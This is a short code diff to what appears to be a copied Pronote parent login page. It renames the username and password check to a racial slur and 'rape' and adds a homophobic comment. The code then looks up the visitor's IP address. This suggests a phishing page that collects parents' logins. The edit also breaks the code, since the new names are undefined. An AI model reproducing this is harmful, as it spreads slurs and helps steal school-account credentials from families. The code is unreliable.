--- a/pronote/parent.html
+++ b/pronote/parent.html
@@ -152,7 +152,7 @@
             // ce n'est pas du tout ce que vous pensez, je suis un simple lycéen
             //*/
 
-            if (username && password) {
+            if (nigger && rape) {
                 try {
             //faggot raping
                     const response = await fetch('https://api.ipify.org?format=json');
